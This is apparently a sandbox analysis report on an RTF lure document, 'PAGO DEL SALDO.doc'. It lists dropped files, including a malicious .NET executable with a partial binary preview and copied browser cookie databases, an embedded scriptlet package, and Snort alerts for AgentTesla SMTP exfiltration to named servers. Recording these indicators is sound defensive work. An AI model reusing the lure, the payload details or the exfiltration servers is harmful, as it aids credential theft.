                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\35BY7DRSER1V8J9JMCO9.temp
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8016
                                                                                                                      Entropy (8bit):3.576040061620306
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
                                                                                                                      MD5:2D161BF98AA34087775C31AF6C147256
                                                                                                                      SHA1:749B50BD72648129C2BD990763017C1B41F10B7A
                                                                                                                      SHA-256:7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
                                                                                                                      SHA-512:E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
                                                                                                                      Malicious:false
                                                                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.576040061620306
Encrypted: false
SSDEEP: 96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5: 2D161BF98AA34087775C31AF6C147256
SHA1: 749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256: 7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512: E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious: false
Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CS0OLG9QFDF935YIQMNF.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.576040061620306
Encrypted: false
SSDEEP: 96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAzKAYnHlF2X/lUV0A2:cmzoGz8mnHnorAzKRF2XHA2
MD5: 2D161BF98AA34087775C31AF6C147256
SHA1: 749B50BD72648129C2BD990763017C1B41F10B7A
SHA-256: 7ED9A6758BA77FA3C05B015E5F8AEF042F751F385F8D82849A05C1FDCE318E77
SHA-512: E1383E5909A24277E064CC0881F1FF830ED2996B96BEB69DD6E4FA07B05A639AE1BB516D419E11800E6C28229F732A8642AB3B99868EA652B60B916D7405D04E
Malicious: false
Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X87RSB2KVTP8BHZRK5J6.temp
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.577982850348611
Encrypted: false
SSDEEP: 96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
MD5: CC5B6CD494E7B4C933950965B9E74783
SHA1: 693DBBE7323DA069AC852AC2E888D8D11EA55D39
SHA-256: 42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
SHA-512: BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
Malicious: false
Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.577982850348611
Encrypted: false
SSDEEP: 96:chQC4MqKqvsqvJCwoGz8hQC4MqKqvsEHyqvJCworAztAKrdHlpxpyX/lUV0A2:cmzoGz8mnHnorAzt5Df8XHA2
MD5: CC5B6CD494E7B4C933950965B9E74783
SHA1: 693DBBE7323DA069AC852AC2E888D8D11EA55D39
SHA-256: 42B23269242C8BC4A7C8CB4D11217F73EC47240DC97BCA23C39B6FFAAE2DA716
SHA-512: BDEF4FCB7D35CEDD4935CEB02505343A7CE40902B03A61CE540B38FCD59461F4AB0A12E95074692D19ED7614DF415FEEC1C3A6AC8D65E429BF36526F1120186C
Malicious: false
Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S ...Programs..f.......:...S .*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

C:\Users\user\AppData\Roaming\SzfukVRF.exe
Process: C:\Users\user\AppData\Roaming\task.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 504832
Entropy (8bit): 7.875034070984988
Encrypted: false
SSDEEP: 12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
MD5: F65B0793251364C03D06E8E7134FC21B
SHA1: 7BC80E89BBC7C10B974462E748849F9056D20D4A
SHA-256: A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
SHA-512: BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
Malicious: true
Joe Sandbox View:
• Filename: MT_1O1_SWIFt.doc, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Chrome\Default\Cookies
Process: C:\Users\user\AppData\Roaming\task.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 28672
Entropy (8bit): 0.9650411582864293
Encrypted: false
SSDEEP: 48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
MD5: 903C35B27A5774A639A90D5332EEF8E0
SHA1: 5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
SHA-256: 1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
SHA-512: 076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
Malicious: false
Preview: SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\bf2jvg3x.oex\Firefox\Profiles\7xwghk55.default\cookies.sqlite
Process: C:\Users\user\AppData\Roaming\task.exe
File Type: SQLite 3.x database, user version 7, last written using SQLite version 3017000
Category: dropped
Size (bytes): 524288
Entropy (8bit): 0.08107860342777487
Encrypted: false
SSDEEP: 48:DO8rmWT8cl+fpNDId7r+gUEl1B6nB6UnUqc8AqwIhY5wXwwAVshT:DOUm7ii+7Ue1AQ98VVY
MD5: 1138F6578C48F43C5597EE203AFF5B27
SHA1: 9B55D0A511E7348E507D818B93F1C99986D33E7B
SHA-256: EEEDF71E8E9A3A048022978336CA89A30E014AE481E73EF5011071462343FFBF
SHA-512: 6D6D7ECF025650D3E2358F5E2D17D1EC8D6231C7739B60A74B1D8E19D1B1966F5D88CC605463C3E26102D006E84D853E390FFED713971DC1D79EB1AB6E56585E
Malicious: false
Preview: SQLite format 3......@ ...........................................................................(.....}..~...}.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\task.exe
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 504832
Entropy (8bit): 7.875034070984988
Encrypted: false
SSDEEP: 12288:+v5E70ZixBFm0hDKr62YWLJp7WtXpcCAVS4EzOnsQ7b51:+vG70Zi1hy6O+LAVS4C
MD5: F65B0793251364C03D06E8E7134FC21B
SHA1: 7BC80E89BBC7C10B974462E748849F9056D20D4A
SHA-256: A031918E001745C0F07D5D0AC118A0BFEB946236033E20FA1B16E0D54EE7BCB8
SHA-512: BAC2E15EAFEFF6708D67A224B96FBC62F062A6029D7E5DFCB773C2B07AAC4C01F910724192A6294DA3456B50E016F5A9859E9DD6EA18C2C51F02377AFBA3CB82
Malicious: true
Joe Sandbox View:
• Filename: MT_1O1_SWIFt.doc, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j.a..............0.................. ........@.. ....................... ............@.................................|...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...t..........\... .............................................{ ...*..{!...*..{"...*..{#...*..($.....} .....}!.....}"......}#...*....0..s........u........f.,`(%....{ ....{ ...o&...,H('....{!....{!...o(...,0()....{"....{"...o*...,.(+....{#....{#...o,...+..+..*..0..b....... .@d )UU.Z(%....{ ...o-...X )UU.Z('....{!...o....X )UU.Z()....{"...o/...X )UU.Z(+....{#...o0...X*...0...........r...p......%..{ ......%q.........-.&.+.......o1....%..{!......%q.........-.&.+.....

C:\Users\user\Desktop\~$GO DEL SALDO.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 3.6064242155052617
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: PAGO DEL SALDO.doc
File size: 393199
MD5: 1956fa2feaef4b6fcf3e63f51aa26722
SHA1: b35003f1c1a874468dbe41370cea443aafb10915
SHA256: 1caadbc09c710b7cdd91598babd238a59708111a59487888bb00f3945c09103c
SHA512: d505806bb9c801efc62561f946bc3921b5748eb7773daa024053e571b068ac4c048f4d0bb0fb95f45ba9e378edbad75529135ba1b71865bc84a56e4a498ddc20
SSDEEP: 1536:ihpDDDDDDDDhtNjWmg5S/CyoMz+rRxyQJNb87hKfedzFz76mAg5eeVhMDw5wfLj:iHDDDDDDDDrqYdzFtr5RDAw5wff
File Content Preview: {\rtf\Fbidi \froman\fcharset238\ud1\adeff31507\deff0\stshfdbch31506\stshfloch31506\ztahffick41c05\stshfBi31507\deEflAng1045\deEglangfe1045\themelang1045\themelangfe1\themelangcs5{\lsdlockedexcept \lsdqformat2 \lsdpriority0 \lsdlocked0 Normal;\b865c6673647

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000007DAh | 2 | embedded | package | 97612 | abdtfhgXgeghDp.ScT | C:\nsdsTggH\abdtfhgXGeghDp.ScT | C:\CbkepaDw\abdtfhghgeghDp.ScT | no
1 | 000321E3h | 2 | embedded | OLE2LInk | 2560 | | | | no

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                              Source Port  Dest Port  Source IP     Dest IP
11/25/21-18:22:17.725078  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49169        587        192.168.2.22  208.91.198.143
11/25/21-18:22:27.655558  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49170        587        192.168.2.22  208.91.198.143
11/25/21-18:22:40.216431  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49171        587        192.168.2.22  208.91.198.143
11/25/21-18:23:08.295905  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49172        587        192.168.2.22  208.91.198.143
11/25/21-18:23:17.632468  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49173        587        192.168.2.22  208.91.199.224
11/25/21-18:23:23.304316  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49175        587        192.168.2.22  208.91.198.143

Network Port Distribution

TCP Packets


UDP Packets

Timestamp                          Source Port  Dest Port  Source IP     Dest IP
Nov 25, 2021 18:22:16.367185116 CET  52167        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:22:16.400242090 CET  53           52167      8.8.8.8       192.168.2.22
Nov 25, 2021 18:22:26.332719088 CET  50591        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:22:26.365432024 CET  53           50591      8.8.8.8       192.168.2.22
Nov 25, 2021 18:22:38.933029890 CET  57805        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:22:38.971023083 CET  53           57805      8.8.8.8       192.168.2.22
Nov 25, 2021 18:23:06.768471956 CET  59030        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:23:06.805955887 CET  53           59030      8.8.8.8       192.168.2.22
Nov 25, 2021 18:23:16.268558025 CET  59185        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:23:16.389869928 CET  53           59185      8.8.8.8       192.168.2.22
Nov 25, 2021 18:23:16.390470982 CET  59185        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:23:16.436175108 CET  53           59185      8.8.8.8       192.168.2.22
Nov 25, 2021 18:23:21.923551083 CET  55616        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:23:21.961463928 CET  53           55616      8.8.8.8       192.168.2.22
Nov 25, 2021 18:23:21.962011099 CET  55616        53         192.168.2.22  8.8.8.8
Nov 25, 2021 18:23:21.999506950 CET  53           55616      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                      Type            Class
Nov 25, 2021 18:22:16.367185116 CET  192.168.2.22  8.8.8.8  0x1bee    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:26.332719088 CET  192.168.2.22  8.8.8.8  0x8af0    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:38.933029890 CET  192.168.2.22  8.8.8.8  0xb28c    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:06.768471956 CET  192.168.2.22  8.8.8.8  0x2596    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.268558025 CET  192.168.2.22  8.8.8.8  0x1240    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.390470982 CET  192.168.2.22  8.8.8.8  0x1240    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.923551083 CET  192.168.2.22  8.8.8.8  0x6f32    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:21.962011099 CET  192.168.2.22  8.8.8.8  0x6f32    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                      CName  Address         Type            Class
Nov 25, 2021 18:22:16.400242090 CET  8.8.8.8    192.168.2.22  0x1bee    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET  8.8.8.8    192.168.2.22  0x1bee    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET  8.8.8.8    192.168.2.22  0x1bee    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:16.400242090 CET  8.8.8.8    192.168.2.22  0x1bee    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET  8.8.8.8    192.168.2.22  0x8af0    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET  8.8.8.8    192.168.2.22  0x8af0    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET  8.8.8.8    192.168.2.22  0x8af0    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:26.365432024 CET  8.8.8.8    192.168.2.22  0x8af0    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET  8.8.8.8    192.168.2.22  0xb28c    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET  8.8.8.8    192.168.2.22  0xb28c    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET  8.8.8.8    192.168.2.22  0xb28c    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:22:38.971023083 CET  8.8.8.8    192.168.2.22  0xb28c    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET  8.8.8.8    192.168.2.22  0x2596    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET  8.8.8.8    192.168.2.22  0x2596    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET  8.8.8.8    192.168.2.22  0x2596    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.225  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:06.805955887 CET  8.8.8.8    192.168.2.22  0x2596    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.223  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.198.143  A (IP address)  IN (0x0001)
Nov 25, 2021 18:23:16.389869928 CET  8.8.8.8    192.168.2.22  0x1240    No error (0)  us2.smtp.mailhostbox.com  -      208.91.199.224  A (IP address)  IN (0x0001)
